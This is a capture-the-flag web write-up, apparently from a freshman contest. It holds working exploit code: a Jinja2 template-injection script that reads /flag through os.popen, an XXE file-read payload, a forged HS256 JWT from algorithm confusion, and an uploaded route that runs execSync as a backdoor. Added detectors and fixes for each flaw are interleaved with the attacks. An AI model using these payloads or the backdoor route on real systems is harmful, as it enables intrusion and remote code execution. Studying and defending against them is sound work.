Preface
Fighting the freshman contest and the innovation project application on two threads at once QwQ
This kid barely got any sleep TwT
But fifth place in the end OvO, not bad
To think that a year ago I didn't know anything at all!
CheckIn
Bypass by passing the parameter as an array
Include
php://filter pseudo-protocol
Easy Flask
Consider using {% if(payload) %}1{% endif %} to get around the filter on {{.
For filtered keywords, use ""|attr('__cla''ss__') (adjacent string literals are concatenated by Jinja2) to bypass the keyword filter.
Blind injection via string greater-than comparison; see the exp below for details.
import requests

url = "http://114.117.187.56:11003/view?name="
flag = ''
# Recover the flag one character at a time: the template compares the command output
# with the guess using '>' and renders 1 on true, so the first guess that stops
# rendering tells us the previous character was correct.
for i in range(1, 50):
    print(i)
    for k in range(1, 128):
        res = requests.get(url + "{%+if(()|attr('__cla''ss__')|attr('__ba''se__')|attr('__subcl''asses__')()|attr('__g''et''it''em__')(175)|attr('__in''it__')|attr('_''_g''l''o''b''a''l''s__')|attr('__g''eti''tem__')('__buil''tins__')|attr('__g''eti''tem__')('ev''al')('__imp''ort__(\"o''s\").popen(\"c''at+/flag\").read()')>'" + flag + chr(k) + "')+%}1{%+endif+%}")
        if res.text == 'NO':
            flag = flag + chr(k - 1)
            break
    print(flag)
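From the defender's side, the interesting property of this payload is the string splitting ('__cla''ss__', '_''_g''l''o''b''a''l''s__') that defeats a naive keyword blocklist. The following detector is an added example, not code from the writeup or the challenge: it undoes the concatenation trick before matching, so the dunder names the page's payload assembles at template-render time become visible again in a WAF or log-review check. The sample parameters are constructed here.

```python
import re
from typing import List

# Constructed sample request parameters (the first mirrors the shape of the writeup's payload).
SAMPLES = [
    "{%+if(()|attr('__cla''ss__')|attr('__ba''se__')|attr('__subcl''asses__')())+%}1{%+endif+%}",
    "{{ ''.__class__.__base__ }}",
    "hello world",
    "{% if user %}Hi {{ user }}{% endif %}",
]

# Dunder names that only appear in user input when someone is walking the object graph
# out of a Jinja2 sandbox; a legitimate template parameter has no business containing them.
DANGEROUS = {
    "__class__", "__base__", "__subclasses__", "__globals__", "__builtins__",
    "__import__", "__init__", "__getitem__", "__mro__",
}


def normalize(param: str) -> str:
    """Undo the obfuscations the payload relies on so a keyword match works again."""
    s = param.replace("+", " ")          # form-encoded spaces
    s = re.sub(r"'\s*'", "", s)           # join adjacent literals: '__cla''ss__' -> '__class__'
    s = re.sub(r'"\s*"', "", s)           # same for double-quoted literals
    return s


def find_dunders(param: str) -> List[str]:
    """Return the dangerous dunder names present after normalization, sorted."""
    found = set(re.findall(r"__[A-Za-z]+__", normalize(param)))
    return sorted(found & DANGEROUS)


def is_suspicious(param: str) -> bool:
    """Flag only when template syntax and a dangerous attribute walk occur together."""
    s = normalize(param)
    has_template_syntax = "{{" in s or "{%" in s
    return has_template_syntax and bool(find_dunders(s))


if __name__ == "__main__":
    for p in SAMPLES:
        print(is_suspicious(p), find_dunders(p), p[:60])
```

The normalization step is the point: a blocklist that matches `__class__` on the raw parameter never fires on this payload, while the same blocklist applied after joining adjacent string literals does. It is a detection aid, not a fix; the real mitigation is not to render user input as a template at all.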
baby_spring
XXE; the filter is bypassed by writing the inner entity declaration with HTML entity encoding inside a parameter entity.
payload:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY % a "<!ENTITY exp SYSTEM 'file:///flag' >" > %a;]>
<data>
&exp;
</data>
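The bypass works because the inner `<!ENTITY exp SYSTEM ...>` is never present literally: it is assembled by the parser from a parameter entity, optionally with its angle brackets written as character references. The added example below is not code from the writeup or the target; it contrasts a blocklist that looks for the literal external-entity shape with the check that actually holds up, which is to reject any DOCTYPE before the parser sees it. The encoded variant and the benign document are constructed samples.

```python
import re
import xml.etree.ElementTree as ET

# Constructed samples. LITERAL_PAYLOAD mirrors the shape of the writeup's payload; ENCODED_PAYLOAD
# is a constructed variant where the inner declaration uses numeric character references.
LITERAL_PAYLOAD = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<!DOCTYPE foo [ <!ENTITY % a "<!ENTITY exp SYSTEM \'file:///flag\' >" > %a;]>'
    '<data>&exp;</data>'
)
ENCODED_PAYLOAD = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<!DOCTYPE foo [ <!ENTITY % a "&#x3C;!ENTITY exp SYSTEM \'file:///flag\' &#x3E;" > %a;]>'
    '<data>&exp;</data>'
)
BENIGN = '<?xml version="1.0"?><data><name>alice</name></data>'


def naive_filter_blocks(doc: str) -> bool:
    """Keyword blocklist written against the textbook payload: '<!ENTITY name SYSTEM'.
    A parameter entity ('%') or character references never match it."""
    return re.search(r"<!ENTITY\s+\w+\s+SYSTEM", doc, re.IGNORECASE) is not None


def strict_filter_blocks(doc: str) -> bool:
    """Refuse any document that carries a DTD at all. Every entity declaration, encoded or
    not, has to live inside a DOCTYPE, so this cannot be bypassed by rewriting the inside."""
    return re.search(r"<!DOCTYPE", doc, re.IGNORECASE) is not None


def parse_safely(doc: str) -> ET.Element:
    """Apply the strict check before handing the bytes to the XML parser."""
    if strict_filter_blocks(doc):
        raise ValueError("DTD not allowed")
    return ET.fromstring(doc)


if __name__ == "__main__":
    for name, doc in [("literal", LITERAL_PAYLOAD), ("encoded", ENCODED_PAYLOAD), ("benign", BENIGN)]:
        print(name, "naive:", naive_filter_blocks(doc), "strict:", strict_filter_blocks(doc))
```

The pre-check is a belt-and-braces layer; the primary fix on a Spring/Java stack is to disable DTDs and external entities on the parser factory itself (`disallow-doctype-decl`, `SUPPORT_DTD=false` and friends), so that no content-level filter is load-bearing.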
JSJSJS
Look up the route address on Baidu and visit it directly.
baby_ip
Intercept the request and change the password and the XFF header:
X-Forwarded-For: 127.0.0.1
password=hggyyds
可爱的探针 (Cute Probe)
The flag is in phpinfo.
真ikun进 (Real ikuns only)
The flag is in the JS code.
简单的cms (Simple CMS)
As is well known, XiongHai CMS V1.0 has a file inclusion vulnerability on the home page, and pecl/pear is installed.
Consider using pearcmd for the file inclusion.
unserialize
Change the element count in the serialized string to bypass __wakeup().
node
The public key is leaked; change the JWT algorithm to HS256 to obtain Admin privileges.
Use URL (percent) encoding to bypass the filename filter.
const jwt = require('jsonwebtoken');
var fs = require('fs');
var privateKey = fs.readFileSync('private.pem'); // not needed: we never had the private key
var publicKey = fs.readFileSync('public.pem');   // the leaked public key
// Algorithm confusion: sign with HS256 using the public key bytes as the HMAC secret,
// and percent-encode the pathname to slip past the filename filter.
var token = jwt.sign({"username": "FlowerYang","isAdmin": true,"home": {"href":"a","origin":"a","protocol":"file:","hostname":"","pathname":"%72outes/api.j%73"},"iat": 1668359673}, publicKey, { algorithm: 'HS256' });
console.log(token);
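Both weaknesses in this challenge come from trusting attacker-controlled bytes before normalizing them: the `alg` field of the JWT header, and a pathname that is checked before it is percent-decoded. The block below is an added example, not code from the writeup or the challenge; it uses only the Python standard library to show a verifier that pins the algorithm server-side next to one that takes `alg` from the header, and a path check that decodes and normalizes before comparing. The public-key bytes, secret and claims are constructed stand-ins.

```python
import base64
import hashlib
import hmac
import json
import posixpath
from urllib.parse import unquote

# Constructed stand-in for the leaked public key (on the target it is a real PEM file).
PUBLIC_KEY = b"-----BEGIN PUBLIC KEY-----\nconstructed-example-key\n-----END PUBLIC KEY-----\n"


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign_hs256(claims: dict, key: bytes) -> str:
    """Mint an HS256 token; mirrors jwt.sign(..., { algorithm: 'HS256' }) in the writeup."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = (b64url(json.dumps(header, separators=(",", ":")).encode()) + "."
                     + b64url(json.dumps(claims, separators=(",", ":")).encode()))
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def verify_vulnerable(token: str, key: bytes) -> dict:
    """Trusts the header's alg. Configured with an RSA public key, it will happily run HMAC
    with those public bytes as the secret, which is exactly what the challenge exploits."""
    h, p, s = token.split(".")
    alg = json.loads(b64url_decode(h)).get("alg")
    if alg == "HS256":
        expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, b64url_decode(s)):
            raise ValueError("bad signature")
        return json.loads(b64url_decode(p))
    raise NotImplementedError("RS256 path omitted in this example")


def verify_pinned(token: str, expected_alg: str, key: bytes) -> dict:
    """The fix: the server decides the algorithm; a header that disagrees is rejected
    before any key material is touched."""
    h, p, s = token.split(".")
    alg = json.loads(b64url_decode(h)).get("alg")
    if alg != expected_alg:
        raise ValueError(f"alg {alg!r} rejected; this service only accepts {expected_alg}")
    if expected_alg == "HS256":  # here `key` must be a real shared secret, never a public key
        expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, b64url_decode(s)):
            raise ValueError("bad signature")
        return json.loads(b64url_decode(p))
    raise NotImplementedError("RS256 verification needs an RSA library; the alg check is the point")


def naive_path_check(pathname: str) -> bool:
    """Compares the raw string, so %72outes/api.j%73 is not recognised as routes/api.js."""
    return "routes/api.js" not in pathname


def strict_path_check(pathname: str) -> bool:
    """Decode (repeatedly, for double encoding) and normalize before comparing."""
    decoded = pathname
    for _ in range(3):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    normalized = posixpath.normpath(decoded).lower()
    if normalized.startswith("..") or normalized.startswith("/"):
        return False
    return "routes/api.js" not in normalized


if __name__ == "__main__":
    forged = sign_hs256({"username": "FlowerYang", "isAdmin": True}, PUBLIC_KEY)
    print("vulnerable verifier accepts forged token:", verify_vulnerable(forged, PUBLIC_KEY))
    try:
        verify_pinned(forged, "RS256", PUBLIC_KEY)
    except ValueError as e:
        print("pinned verifier:", e)
    print(naive_path_check("%72outes/api.j%73"), strict_path_check("%72outes/api.j%73"))
```

In jsonwebtoken the pinned behaviour corresponds to passing `algorithms: ['RS256']` to `jwt.verify`, so that a token whose header says HS256 fails before the key is used.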
Modify api.js to obtain the flag.
Change the content to:
// new route that runs the readflag binary and returns its output
router.post('/something', function(req, res, next) {
    var s = require("child_process").execSync("cd ..&&./readflag");
    return res.status(200).send(s.toString());
});
exp
import requests

# Step 1: upload the modified api.js using the forged admin token
headers = {
    "Authorization": "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IkZsb3dlcllhbmciLCJpc0FkbWluIjp0cnVlLCJob21lIjp7ImhyZWYiOiJhIiwib3JpZ2luIjoiYSIsInByb3RvY29sIjoiZmlsZToiLCJob3N0bmFtZSI6IiIsInBhdGhuYW1lIjoiJTcyb3V0ZXMvYXBpLmolNzMifSwiaWF0IjoxNjY4MzU5NjczfQ.WyecAqFGsvXMgcdmfV--vg5ZIbfEr0KLIfYnEiiu3uQ"
}
url = "http://114.117.187.56:11010/api/upload"
filename = "file"
content = open("1.txt", "rb").read()   # 1.txt holds the modified api.js
file = {filename: content}
res = requests.post(url, headers=headers, files=file)
print(res.text)
import requests

# Step 2: call the newly added route to read the flag
headers = {
    "Authorization": "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IkZsb3dlcllhbmciLCJpc0FkbWluIjp0cnVlLCJob21lIjp7ImhyZWYiOiJhIiwib3JpZ2luIjoiYSIsInByb3RvY29sIjoiZmlsZToiLCJob3N0bmFtZSI6IiIsInBhdGhuYW1lIjoiJTcyb3V0ZXMvYXBpLmolNzMifSwiaWF0IjoxNjY4MzU5NjczfQ.WyecAqFGsvXMgcdmfV--vg5ZIbfEr0KLIfYnEiiu3uQ"
}
url = "http://114.117.187.56:11010/api/something"
res = requests.post(url, headers=headers)
print(res.text)
可爱的探针2.0 (Cute Probe 2.0)
Check the PHP version in phpinfo, then use the php-8.1.0-dev backdoor for RCE.